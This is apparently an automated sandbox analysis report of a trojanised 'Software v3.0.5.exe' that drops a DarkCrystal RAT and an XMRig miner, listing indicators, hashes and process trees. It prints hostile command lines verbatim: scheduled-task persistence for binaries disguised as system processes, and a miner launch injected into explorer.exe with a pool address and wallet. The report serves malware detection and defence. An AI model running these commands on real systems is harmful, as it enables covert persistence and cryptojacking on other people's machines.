Analysis
max time kernel: 101s
max time network: 122s
platform: windows7_x64
resource: win7v20210408
submitted: 22-07-2021 22:41
Static task: static1
Behavioral task: behavioral1
Sample: Software v3.0.5.exe
Resource: win7v20210408
General
Target: Software v3.0.5.exe
Size: 910KB
MD5: 56d73f0b8c89094a9f0ad6277f042b3d
SHA1: 6efe8b8257f030fdb63a069aad558b6282310a31
SHA256: c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512: 6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
Processes:
  resource                                 yara_rule
  \Users\Admin\AppData\Roaming\Dcr.exe     Dark_crystal_rat
  C:\Users\Admin\AppData\Roaming\Dcr.exe   Dark_crystal_rat
  C:\Users\Admin\AppData\Roaming\Dcr.exe   Dark_crystal_rat
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
  resource                                                                       yara_rule
  \Users\Admin\AppData\Roaming\Dcr.exe                                           dcrat
  C:\Users\Admin\AppData\Roaming\Dcr.exe                                         dcrat
  C:\Users\Admin\AppData\Roaming\Dcr.exe                                         dcrat
  \fonthostSvc\fonthostSvcIntodhcp.exe                                           dcrat
  C:\fonthostSvc\fonthostSvcIntodhcp.exe                                         dcrat
  C:\fonthostSvc\fonthostSvcIntodhcp.exe                                         dcrat
  C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe     dcrat
  C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe     dcrat
-
XMRig Miner Payload 3 IoCs
Processes:
  resource                                                                        yara_rule
  behavioral1/memory/1908-160-0x0000000140000000-0x0000000140758000-memory.dmp    xmrig
  behavioral1/memory/1908-161-0x00000001402EB66C-mapping.dmp                      xmrig
  behavioral1/memory/1908-163-0x0000000140000000-0x0000000140758000-memory.dmp    xmrig
-
Executes dropped EXE 9 IoCs
Processes:
  pid    process
  1728   Dcr.exe
  1424   etc.exe
  1952   xmr.exe
  1308   fonthostSvcIntodhcp.exe
  2000   conhost.exe
  2036   services64.exe
  2008   services32.exe
  660    sihost32.exe
  1928   sihost64.exe
-
Loads dropped DLL 8 IoCs
Processes:
  pid    process
  1640   Software v3.0.5.exe
  1640   Software v3.0.5.exe
  1640   Software v3.0.5.exe
  1676   cmd.exe
  1952   xmr.exe
  1424   etc.exe
  2008   services32.exe
  2036   services64.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow   ioc
  8      ipinfo.io
  9      ipinfo.io
-
Drops file in System32 directory 12 IoCs
Processes:
  description    ioc                                                                                   process
  File created   C:\Windows\System32\capisp\69ddcba757bf72f7d36c464c71f42baab150b2b9                   fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\wbem\portabledevicetypes\24dbde2999530ef5fd907494bc374d663924116c  fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\C_863\c5b4cb5e9653cce737f29f72ba880dd4c4bab27d                    fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\wbem\dot3\WmiPrvSE.exe                                             fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\wbem\dot3\24dbde2999530ef5fd907494bc374d663924116c                fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\chajei\886983d96e3d3e31032c679b2d4ea91b6c05afef                   fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\capisp\smss.exe                                                    fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\snmptrap\101b941d020240259ca4912829b53995ad543df6                 fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\chajei\csrss.exe                                                   fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\wbem\portabledevicetypes\WmiPrvSE.exe                              fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\C_863\services.exe                                                 fonthostSvcIntodhcp.exe
  File created   C:\Windows\System32\snmptrap\lsm.exe                                                   fonthostSvcIntodhcp.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description              pid    process          target process
  set thread context of    2036   services64.exe   1908 explorer.exe
-
Drops file in Program Files directory 5 IoCs
Processes:
  description                    ioc                                                                              process
  File created                   C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe                        fonthostSvcIntodhcp.exe
  File opened for modification   C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe                        fonthostSvcIntodhcp.exe
  File created                   C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\27d1bcfc3c54e0e44ea423ffd4ee81fe73670a2a   fonthostSvcIntodhcp.exe
  File created                   C:\Program Files\Windows Sidebar\Shared Gadgets\WMIADAP.exe                       fonthostSvcIntodhcp.exe
  File created                   C:\Program Files\Windows Sidebar\Shared Gadgets\75a57c1bdf437c0c81ad56e81f43c7323ed35745   fonthostSvcIntodhcp.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid    process
  1608   schtasks.exe
  1616   schtasks.exe
  1956   schtasks.exe
  1924   schtasks.exe
  1684   schtasks.exe
  1148   schtasks.exe
  1244   schtasks.exe
  1860   schtasks.exe
  1740   schtasks.exe
  1152   schtasks.exe
  1692   schtasks.exe
  1312   schtasks.exe
  1572   schtasks.exe
  1916   schtasks.exe
  1276   schtasks.exe
-
Modifies system certificate store
Processes:
  description        ioc                                                                                                                              process
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C           services32.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted)   services32.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted)   services64.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25           services64.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13           services64.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted)   services64.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted)   services32.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted)   services64.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C           services64.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted)   services32.exe
  Set value (data)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted)   services64.exe
  Key created        \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13           services32.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
  pid    process
  1308   fonthostSvcIntodhcp.exe
  1308   fonthostSvcIntodhcp.exe
  1308   fonthostSvcIntodhcp.exe
  2000   conhost.exe
  2000   conhost.exe
  1952   xmr.exe
  1424   etc.exe
  2008   services32.exe
  2036   services64.exe
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
  description                    pid    process
  Token: SeDebugPrivilege        1308   fonthostSvcIntodhcp.exe
  Token: SeDebugPrivilege        2000   conhost.exe
  Token: SeDebugPrivilege        1952   xmr.exe
  Token: SeDebugPrivilege        1424   etc.exe
  Token: SeDebugPrivilege        2008   services32.exe
  Token: SeDebugPrivilege        2036   services64.exe
  Token: SeLockMemoryPrivilege   1908   explorer.exe
  Token: SeLockMemoryPrivilege   1908   explorer.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  PID 1640 (Software v3.0.5.exe) wrote to memory of 1728 (Dcr.exe), 4 entries
  PID 1640 (Software v3.0.5.exe) wrote to memory of 1424 (etc.exe), 4 entries
  PID 1640 (Software v3.0.5.exe) wrote to memory of 1952 (xmr.exe), 4 entries
  PID 1728 (Dcr.exe) wrote to memory of 1984 (WScript.exe), 4 entries
  PID 1984 (WScript.exe) wrote to memory of 1676 (cmd.exe), 4 entries
  PID 1676 (cmd.exe) wrote to memory of 1308 (fonthostSvcIntodhcp.exe), 4 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1608 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1244 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1152 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1860 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1692 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1616 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1276 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1312 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1956 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1572 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1916 (schtasks.exe), 3 entries
  PID 1308 (fonthostSvcIntodhcp.exe) wrote to memory of 1816 (cmd.exe), 3 entries
  PID 1816 (cmd.exe) wrote to memory of 1924 (chcp.com), 3 entries
  PID 1816 (cmd.exe) wrote to memory of 1632 (PING.EXE), 1 entry
Processes

[1] C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
    "C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Roaming\Dcr.exe
      C:\Users\Admin\AppData\Roaming\Dcr.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory

        [5] C:\fonthostSvc\fonthostSvcIntodhcp.exe
            "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
            - Executes dropped EXE
            - Drops file in System32 directory
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\dot3\WmiPrvSE.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\chajei\csrss.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\capisp\smss.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\WMIADAP.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\portabledevicetypes\WmiPrvSE.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Windows\System32\C_863\services.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\WmiPrvSE.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\snmptrap\lsm.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\system32\schtasks.exe
              "schtasks" /create /tn "fonthostSvcIntodhcp" /sc ONLOGON /tr "'C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D\fonthostSvcIntodhcp.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)

          [6] C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E0QiScuzVl.bat"
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\chcp.com
                chcp 65001

            [7] C:\Windows\system32\PING.EXE
                ping -n 5 localhost
                - Runs ping.exe

            [7] C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
                "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

  [2] C:\Users\Admin\AppData\Roaming\etc.exe
      C:\Users\Admin\AppData\Roaming\etc.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit

      [4] C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
          - Creates scheduled task(s)

    [3] C:\Users\Admin\AppData\Roaming\services32.exe
        "C:\Users\Admin\AppData\Roaming\services32.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit

        [5] C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
            - Creates scheduled task(s)

      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
          - Executes dropped EXE

  [2] C:\Users\Admin\AppData\Roaming\xmr.exe
      C:\Users\Admin\AppData\Roaming\xmr.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

      [4] C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          - Creates scheduled task(s)

    [3] C:\Users\Admin\AppData\Roaming\services64.exe
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

        [5] C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            - Creates scheduled task(s)

      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          - Executes dropped EXE

      [4] C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
MD5: 8cf49d252229ed14a26b9a2b45771e1d
SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5: 2902de11e30dcc620b184e3bb0f0c1cb
SHA1: 5d11d14a2558801a2688dc2d6dfad39ac294f222
SHA256: e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
SHA512: efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5: d474de575c39b2d39c8583c5c065498a
SHA1: 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
SHA256: 7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
SHA512: 7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5: 5949b6d3d243defafa799d823f5ed708
SHA1: 4496aeba537ef54bd1a379647c6f6ab6c37ba668
SHA256: 353289617cb102bfcd415c430f0a1ddacd9f509221af0cad8405b2411f799c0e
SHA512: befffe7b2494cd0b7cef6fc7dff6c4edb6b77737048efdaf2ecfdce3b15a173a9eb38cb38e6df31c3dbcb3094a286f44907581677b411db6091890394ce09cbf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5: 2c569b85f5372c5ab32e71aeec218ff2
SHA1: 1d14e6d05d662111d0320faa92625536170cf7a8
SHA256: 433b1fddb8e096cf8e93f4457a7c6cef946d4eadb355aff91df29661ccaaa2e4
SHA512: 5973c822aeb43af795f99487115665edf327c43893525bc1ab9e2b27f5110f8b9bc6f898c7c845ae53f95c3383e5f4be1ff937b76efc0df6da33908d9f6e5ade

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5: 630c0a080f1eeeb5e9a6034416ae88ff
SHA1: 73796f7accda66566cf2711e320a7e1ee25fe01b
SHA256: 33b9a0b15394bbb0a5b7c6e934d58af0d06e36a2db62959f638b56179a4d0021
SHA512: 20cf972feb71ff2124f74998ea3732ae94dfd65ced1c59de6b7667629e923fb70dec2e6e2ee9fd20264b94f41b162aeed000a7fd5abf11734e7e5691c2a460d7

C:\Users\Admin\AppData\Local\Temp\E0QiScuzVl.bat
MD5: 3a0ba4e0a6dfa7dc60540f4a4b4443fa
SHA1: 0ce376430695e3d88752783ec7271ac61e94b285
SHA256: 1f41544c3efa94f352d7ab1c6dcb4f1f1d10f2920377b826965792e55c0b4686
SHA512: 720dd0dbf02fd265679887011506f9a680d724567723f517118af5ae6516d3dbf4c4a983b1ee5ede7eaa75183aa95943c6d86a9b9469d69b892b0d5d810952fb

C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5: 975a0ad02701f9f528784dee5a9728d2
SHA1: 8a3b57da095dd6fc9d61fe004c1025d929370515
SHA256: b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA512: 6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5: 89c453dbd36f561195de8e5c5dce77a0
SHA1: 8cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256: ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512: c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5: 7059ba6625325156b764224d2b2dbd83
SHA1: 4cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA256: 04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512: ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
C:\Users\Admin\AppData\Roaming\etc.exe
MD5: b07420edcab9bae1bb3fe4befc7ee57c
SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
C:\Users\Admin\AppData\Roaming\services32.exe
MD5: b07420edcab9bae1bb3fe4befc7ee57c
SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
C:\Users\Admin\AppData\Roaming\services64.exe
MD5: f99c879d74bf1355905734a411191276
SHA1: 103a41ade035585e4834f7b939e15608fb64d201
SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5: f99c879d74bf1355905734a411191276
SHA1: 103a41ade035585e4834f7b939e15608fb64d201
SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
C:\fonthostSvc\5R3FFGftzpp.vbe
MD5: cb60c41590dc32740e8923ba0cb6df97
SHA1: aabc007b611df20e79fceee539ef63e7f2754304
SHA256: c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
SHA512: a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
MD5: 7245c594f9448bae4a79764fb6897e25
SHA1: 1eb300765111494f6c7049b5abbbb0e5725b39aa
SHA256: 4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
SHA512: 26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5: 8cf49d252229ed14a26b9a2b45771e1d
SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
\Users\Admin\AppData\Roaming\Dcr.exe
MD5: 975a0ad02701f9f528784dee5a9728d2
SHA1: 8a3b57da095dd6fc9d61fe004c1025d929370515
SHA256: b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA512: 6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5: 89c453dbd36f561195de8e5c5dce77a0
SHA1: 8cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256: ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512: c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5: 7059ba6625325156b764224d2b2dbd83
SHA1: 4cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA256: 04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512: ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

\Users\Admin\AppData\Roaming\etc.exe
MD5: b07420edcab9bae1bb3fe4befc7ee57c
SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

\Users\Admin\AppData\Roaming\services32.exe
MD5: b07420edcab9bae1bb3fe4befc7ee57c
SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

\Users\Admin\AppData\Roaming\services64.exe
MD5: f99c879d74bf1355905734a411191276
SHA1: 103a41ade035585e4834f7b939e15608fb64d201
SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
